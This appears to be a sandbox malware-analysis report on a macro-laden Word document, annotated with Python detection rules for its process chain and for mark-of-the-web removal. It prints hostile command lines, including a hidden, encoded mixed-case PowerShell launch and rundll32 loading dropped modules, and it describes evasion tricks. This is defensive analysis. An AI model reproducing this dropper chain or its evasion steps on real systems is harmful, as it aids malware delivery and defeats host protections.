Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\Microsoft.NET\Framework64\v2.0.50727\mscorrc.dll Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\Resiliency\StartupItems Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll Jump to behavior
Source: Binary string: C:\Windows\symbols\dll\System.pdbom source: powershell.exe, 00000005.00000002.2139955069.00000000029F7000.00000004.00000040.sdmp
Source: Binary string: System.Management.Automation.pdb source: powershell.exe, 00000005.00000002.2139955069.00000000029F7000.00000004.00000040.sdmp
Source: Binary string: C:\Windows\symbols\dll\System.Management.Automation.pdbCom source: powershell.exe, 00000005.00000002.2139955069.00000000029F7000.00000004.00000040.sdmp
Source: Binary string: C:\Windows\dll\System.Management.Automation.pdbProg source: powershell.exe, 00000005.00000002.2139955069.00000000029F7000.00000004.00000040.sdmp
Source: Binary string: <ystem.pdbF source: powershell.exe, 00000005.00000002.2139955069.00000000029F7000.00000004.00000040.sdmp
Source: Binary string: ws\System.pdbpdbtem.pdb\a source: powershell.exe, 00000005.00000002.2139955069.00000000029F7000.00000004.00000040.sdmp
Source: Binary string: System.pdb* source: powershell.exe, 00000005.00000002.2139955069.00000000029F7000.00000004.00000040.sdmp
Source: Binary string: C:\Windows\assembly\GAC_MSIL\System.Management.Automation\1.0.0.0__31bf3856ad364e35\System.Management.Automation.pdb source: powershell.exe, 00000005.00000002.2139955069.00000000029F7000.00000004.00000040.sdmp
Source: Binary string: ws\System.Management.Automation.pdbpdbion.pdbERSP source: powershell.exe, 00000005.00000002.2139955069.00000000029F7000.00000004.00000040.sdmp
Source: Binary string: C:\Windows\System.pdbon.dll source: powershell.exe, 00000005.00000002.2139955069.00000000029F7000.00000004.00000040.sdmp
Source: Binary string: C:\Windows\System.Management.Automation.pdb source: powershell.exe, 00000005.00000002.2139955069.00000000029F7000.00000004.00000040.sdmp
Source: Binary string: System.pdb source: powershell.exe, 00000005.00000002.2139955069.00000000029F7000.00000004.00000040.sdmp
Source: Binary string: System.pdb8 source: powershell.exe, 00000005.00000002.2139955069.00000000029F7000.00000004.00000040.sdmp
Source: Binary string: mscorrc.pdb source: powershell.exe, 00000005.00000002.2139174857.0000000002380000.00000002.00000001.sdmp
Source: Binary string: C:\Windows\assembly\GAC_MSIL\System\2.0.0.0__b77a5c561934e089\System.pdb source: powershell.exe, 00000005.00000002.2139955069.00000000029F7000.00000004.00000040.sdmp
Source: Binary string: C:\Windows\dll\System.pdb5\ source: powershell.exe, 00000005.00000002.2139955069.00000000029F7000.00000004.00000040.sdmp
Source: DAT.doc Initial sample: OLE summary subject = Investment Account Garden, Books & Automotive Sleek Planner Ergonomic Cotton Bacon Agent Profound Wooden Enhanced Tasty Gorgeous Soft Shirt end-to-end Estate Russian Ruble

Data Obfuscation:

Document contains an embedded VBA with many GOTO operations indicating source code obfuscation
Source: DAT.doc Stream path 'Macros/VBA/Dwztpwkmgv8q9o28r' : High number of GOTO operations
Source: VBA code instrumentation OLE, VBA macro, High number of GOTO operations: Module Dwztpwkmgv8q9o28r Name: Dwztpwkmgv8q9o28r
PowerShell case anomaly found
Source: unknown Process created: C:\Windows\System32\cmd.exe cmd cmd cmd cmd /c msg %username% /v Word experienced an error trying to open the file. & POwersheLL -w hidden -ENCOD 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
Source: unknown Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe POwersheLL -w hidden -ENCOD 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
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe POwersheLL -w hidden -ENCOD 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 Jump to behavior
Suspicious powershell command line found
Source: unknown Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe POwersheLL -w hidden -ENCOD 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
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe POwersheLL -w hidden -ENCOD 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 Jump to behavior
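Taken together, the process creations on this page form one chain: WINWORD.EXE launches cmd.exe through WMI (Win32_Process::Create, so the recorded parent is not Word), cmd.exe runs a mixed-case `POwersheLL -w hidden -ENCOD`, PowerShell starts the 64-bit rundll32.exe on a DLL in the user profile by ordinal (`#1`), and the 32-bit rundll32.exe then relaunches itself on modules with random names and non-DLL extensions under SysWOW64. The Python below is an added example, not Joe Sandbox output: it encodes those traits as command-line rules and runs them over constructed process events whose command lines are copied from this page. `WmiPrvSE.exe` as the parent of cmd.exe is an assumption (the report lists that parent as unknown), `ENC_STUB` is the first 32 characters of the page's encoded argument, and the two explorer.exe-launched events are invented benign controls.

```python
import re

# Constructed process-creation events modelled on this report's process tree.
# Command lines are copied from the report; parent images are assumptions (the
# report lists cmd.exe's parent as unknown; WmiPrvSE.exe is the usual parent
# for Win32_Process::Create). The explorer.exe events are benign controls.
ENC_STUB = "IAAgACQAaQBvAHgASwB5ADIAIAA9ACAA"
PS = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
RUNDLL32 = r"C:\Windows\SysWOW64\rundll32.exe"
SAMPLE_EVENTS = [
    {"parent": r"C:\Windows\System32\wbem\WmiPrvSE.exe", "image": r"C:\Windows\System32\cmd.exe",
     "cmdline": "cmd cmd cmd cmd /c msg %username% /v Word experienced an error trying to "
                "open the file. & POwersheLL -w hidden -ENCOD " + ENC_STUB},
    {"parent": r"C:\Windows\System32\cmd.exe", "image": PS,
     "cmdline": "POwersheLL -w hidden -ENCOD " + ENC_STUB},
    {"parent": PS, "image": r"C:\Windows\System32\rundll32.exe",
     "cmdline": r"'C:\Windows\system32\rundll32.exe' C:\Users\user\O_wgqv7\C0316em\Lyeta6ud.dll #1"},
    {"parent": RUNDLL32, "image": RUNDLL32,
     "cmdline": r"C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Yozs\bhycn.bcx',RunDLL"},
    {"parent": r"C:\Windows\explorer.exe", "image": PS,
     "cmdline": r"powershell.exe -NoProfile -File C:\Scripts\backup.ps1"},
    {"parent": r"C:\Windows\explorer.exe", "image": RUNDLL32,
     "cmdline": "rundll32.exe shell32.dll,Control_RunDLL"},
]

BASE64_RE = re.compile(r"^[A-Za-z0-9+/]{20,}={0,2}$")
ACCEPTED_PS_SPELLINGS = {"powershell", "PowerShell", "Powershell", "POWERSHELL"}
SHELLS = {"cmd.exe", "powershell.exe", "rundll32.exe", "mshta.exe", "wscript.exe", "cscript.exe"}
LOADABLE_EXTS = {".dll", ".cpl", ".ocx", ".ax", ".drv"}   # what rundll32 normally loads
USER_WRITABLE_ROOTS = ("c:\\users\\", "c:\\programdata\\", "c:\\windows\\temp\\")
RUNDLL_RE = re.compile(
    r"""^\s*(?:"[^"]*"|'[^']*'|\S+)\s+"""        # the rundll32 image token itself
    r"""(?P<q>["']?)(?P<mod>[^"',]+?)(?P=q)"""   # module path, optionally quoted
    r"""\s*(?:,\s*(?P<exp1>\S+)|\s+(?P<exp2>\S+))?\s*$"""  # "mod,Export" or "mod #ordinal"
)


def basename(path):
    return path.replace("/", "\\").rsplit("\\", 1)[-1].strip("\"'")


def parse_rundll32(cmdline):
    """Return (module_path, export) from a rundll32 command line, or None."""
    m = RUNDLL_RE.match(cmdline)
    if not m:
        return None
    return m.group("mod").strip(), m.group("exp1") or m.group("exp2")


def powershell_findings(cmdline):
    found = []
    toks = cmdline.split()
    for i, tok in enumerate(toks):
        low = tok.lower()
        nxt = toks[i + 1] if i + 1 < len(toks) else ""
        # powershell.exe takes any unambiguous prefix of a parameter name, so
        # -e, -ec, -enc, -ENCOD all mean -EncodedCommand and -w means -WindowStyle.
        if len(low) >= 2 and "-encodedcommand".startswith(low) and BASE64_RE.match(nxt):
            found.append("ps_encoded_command")
        if len(low) >= 2 and "-windowstyle".startswith(low) and nxt.lower() == "hidden":
            found.append("ps_hidden_window")
        name = basename(tok)
        if name.lower().endswith(".exe"):
            name = name[:-4]
        if name.lower() == "powershell" and name not in ACCEPTED_PS_SPELLINGS:
            found.append("ps_case_anomaly")  # POwersheLL: produced by a generator, not a person
    return found


def rundll32_findings(cmdline):
    found = []
    parsed = parse_rundll32(cmdline)
    if parsed is None:
        return found
    module, export = parsed
    name = basename(module)
    ext = "." + name.rsplit(".", 1)[-1].lower() if "." in name else ".dll"  # LoadLibrary appends .dll
    if ext not in LOADABLE_EXTS:
        found.append("rundll32_non_dll_extension")
    if module.lower().startswith(USER_WRITABLE_ROOTS):
        found.append("rundll32_user_writable_module")
    if export and export.startswith("#"):
        found.append("rundll32_ordinal_export")
    return found


def evaluate(event):
    """Apply every rule to one process-creation event; returns sorted rule ids."""
    hits = []
    parent, child = basename(event["parent"]).lower(), basename(event["image"]).lower()
    if parent == "wmiprvse.exe" and child in SHELLS:
        hits.append("wmi_spawned_shell")
    hits += powershell_findings(event["cmdline"])
    if child == "rundll32.exe":
        hits += rundll32_findings(event["cmdline"])
    return sorted(set(hits))


if __name__ == "__main__":
    for i, ev in enumerate(SAMPLE_EVENTS):
        print(i, basename(ev["image"]), evaluate(ev))
```

The rules are deliberately keyed on structure (prefix-expanded parameters, the module's extension and location, the export form, the spawning parent) rather than on the random names in this sample, so they carry over to the next build, which will use different directory names, extensions and variable names but the same construction.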
Uses code obfuscation techniques (call, push, ret)
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_1000905B push ecx; ret 7_2_1000906E
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_1000E3C5 push ecx; ret 7_2_1000E3D8
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_001BCE92 push cs; retf 7_2_001BCE94
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_001FCE92 push cs; retf 10_2_001FCE94
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_0030CE92 push cs; retf 11_2_0030CE94
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_001CCE92 push cs; retf 13_2_001CCE94
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 15_2_001ACE92 push cs; retf 15_2_001ACE94
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 18_2_0020CE92 push cs; retf 18_2_0020CE94

Persistence and Installation Behavior:

Creates processes via WMI
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE WMI Queries: IWbemServices::ExecMethod - Win32_Process::Create
Drops PE files
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File created: C:\Users\user\O_wgqv7\C0316em\Lyeta6ud.dll Jump to dropped file
Drops PE files to the windows directory (C:\Windows)
Source: C:\Windows\SysWOW64\rundll32.exe PE file moved: C:\Windows\SysWOW64\Yozs\bhycn.bcx Jump to behavior

Hooking and other Techniques for Hiding and Protection:

Hides that the sample has been downloaded from the Internet (zone.identifier)
Source: C:\Windows\SysWOW64\rundll32.exe File opened: C:\Windows\SysWOW64\Yozs\bhycn.bcx:Zone.Identifier read attributes | delete Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe File opened: C:\Windows\SysWOW64\Hxqt\iieutea.ehw:Zone.Identifier read attributes | delete Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe File opened: C:\Windows\SysWOW64\Yjfs\gmxhcr.dhy:Zone.Identifier read attributes | delete Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe File opened: C:\Windows\SysWOW64\Hszr\zft.hxn:Zone.Identifier read attributes | delete Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe File opened: C:\Windows\SysWOW64\Vnjt\awo.cnn:Zone.Identifier read attributes | delete Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe File opened: C:\Windows\SysWOW64\Dkpu\lbsvbo.gas:Zone.Identifier read attributes | delete Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe File opened: C:\Windows\SysWOW64\Opqf\zrop.pvh:Zone.Identifier read attributes | delete
Source: C:\Windows\SysWOW64\rundll32.exe File opened: C:\Windows\SysWOW64\Blgp\gmlbr.kph:Zone.Identifier read attributes | delete
Source: C:\Windows\SysWOW64\rundll32.exe File opened: C:\Windows\SysWOW64\Mnrm\xmfd.ucf:Zone.Identifier read attributes | delete
Source: C:\Windows\SysWOW64\rundll32.exe File opened: C:\Windows\SysWOW64\Wnoc\mhxywle.szw:Zone.Identifier read attributes | delete
Source: C:\Windows\SysWOW64\rundll32.exe File opened: C:\Windows\SysWOW64\Xqby\jcrucsb.dql:Zone.Identifier read attributes | delete
Source: C:\Windows\SysWOW64\rundll32.exe File opened: C:\Windows\SysWOW64\Etxd\pkvco.wzp:Zone.Identifier read attributes | delete
Source: C:\Windows\SysWOW64\rundll32.exe File opened: C:\Windows\SysWOW64\Eiig\mmslr.ajj:Zone.Identifier read attributes | delete
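Each `File opened` line above is the 32-bit rundll32.exe opening the `Zone.Identifier` alternate data stream of a module it has just moved into SysWOW64, with DELETE access. That stream carries the mark-of-the-web that SmartScreen and Office Protected View key on, so deleting it is what the signature name refers to. The Python below is an added example, not from the report: it parses lines in the report's own `Source: ... File opened: ...` form and flags Zone.Identifier deletions by processes that do not normally maintain that stream. The `MOTW_WRITERS` allow-list and the Firefox control line are this example's assumptions.

```python
import re

# Evidence lines copied from this report's zone.identifier signature, plus one
# constructed line for a browser stamping a download (a benign control).
SANDBOX_LINES = [
    r"Source: C:\Windows\SysWOW64\rundll32.exe File opened: C:\Windows\SysWOW64\Yozs\bhycn.bcx:Zone.Identifier read attributes | delete",
    r"Source: C:\Windows\SysWOW64\rundll32.exe File opened: C:\Windows\SysWOW64\Hxqt\iieutea.ehw:Zone.Identifier read attributes | delete",
    r"Source: C:\Windows\SysWOW64\rundll32.exe File opened: C:\Windows\SysWOW64\Yjfs\gmxhcr.dhy:Zone.Identifier read attributes | delete",
    r"Source: C:\Program Files\Mozilla Firefox\firefox.exe File opened: C:\Users\user\Downloads\report.pdf:Zone.Identifier write attributes | write",
]

# Processes that legitimately create or update Zone.Identifier (browsers, mail
# clients, the shell). This allow-list is an assumption of the example.
MOTW_WRITERS = {"firefox.exe", "chrome.exe", "msedge.exe", "iexplore.exe", "outlook.exe", "explorer.exe"}

# "<path>:<stream>" where the stream name has no colon, backslash or space;
# the path is matched lazily so the drive-letter colon is not mistaken for it.
LINE_RE = re.compile(
    r"^Source: (?P<proc>.+?) File opened: (?P<path>.+?):(?P<stream>[^:\\ ]+)\s+(?P<access>.+)$"
)


def parse_line(line):
    """Split a report line into process, file path, ADS name and requested rights."""
    m = LINE_RE.match(line)
    if not m:
        return None
    rights = {r.strip().lower() for r in m.group("access").split("|")}
    return {"proc": m.group("proc"), "path": m.group("path"),
            "stream": m.group("stream"), "rights": rights}


def motw_removal_findings(lines):
    """(process, file) pairs where a non-browser process opened
    <file>:Zone.Identifier with DELETE access, i.e. stripped the mark-of-the-web."""
    findings = []
    for line in lines:
        ev = parse_line(line)
        if ev is None or ev["stream"].lower() != "zone.identifier":
            continue
        proc_name = ev["proc"].rsplit("\\", 1)[-1].lower()
        if "delete" in ev["rights"] and proc_name not in MOTW_WRITERS:
            findings.append((ev["proc"], ev["path"]))
    return findings


if __name__ == "__main__":
    for proc, path in motw_removal_findings(SANDBOX_LINES):
        print(f"{proc} removed Zone.Identifier from {path}")
```

On a live host the same check is a Sysmon event ID 11/23 or an EDR file-stream event where `TargetFilename` ends in `:Zone.Identifier`; the access-rights logic is the part that transfers, the line format is the report's.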
Extensive use of GetProcAddress (often used to hide API calls)
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_1000BA3C GetModuleHandleW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress, 7_2_1000BA3C
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX (57 identical events) Jump to behavior
Source: C:\Windows\System32\cmd.exe Process information set: NOOPENFILEERRORBOX (6 identical events) Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\rundll32.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\rundll32.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\rundll32.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\rundll32.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\rundll32.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\rundll32.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\rundll32.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\rundll32.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\rundll32.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\rundll32.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\rundll32.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\rundll32.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\rundll32.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\rundll32.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\rundll32.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\rundll32.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\rundll32.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\rundll32.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\rundll32.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\rundll32.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\rundll32.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\rundll32.exe Process information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion:

Contains long sleeps (>= 3 min)
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
Found evasive API chain (may stop execution after checking a module file name)
Source: C:\Windows\SysWOW64\rundll32.exe Evasive API call chain: GetModuleFileName,DecisionNodes,ExitProcess
May sleep (evasive loops) to hinder dynamic analysis
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2376 Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\SysWOW64\rundll32.exe File Volume queried: C:\ FullSizeInformation
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 20_2_002075F0 FindFirstFileW, 20_2_002075F0
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData\Roaming
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData\Roaming\Microsoft
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.ini
Source: rundll32.exe, 00000008.00000002.2142890318.000000000086D000.00000004.00000020.sdmp Binary or memory string: ECVMWar_VMware_SATA_CD01_______________1.00____#6&373888b8&0&1.0.0#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{8a079453-cd11-11ea-a1d0-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{8a079453-cd11-11ea-a1d0-806e6f6e6963}#0000000006500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}]
Source: powershell.exe, 00000005.00000002.2137911907.00000000002C7000.00000004.00000020.sdmp Binary or memory string: \\?\IDE#CdRomNECVMWar_VMware_SATA_CD01_______________1.00____#6&373888b8&0&1.0.0#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{8a079453-cd11-11ea-a1d0-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{8a079453-cd11-11ea-a1d0-806e6f6e6963}#0000000006500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}]
Source: C:\Windows\SysWOW64\rundll32.exe API call chain: ExitProcess graph end node
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information queried: ProcessInformation

Anti Debugging:

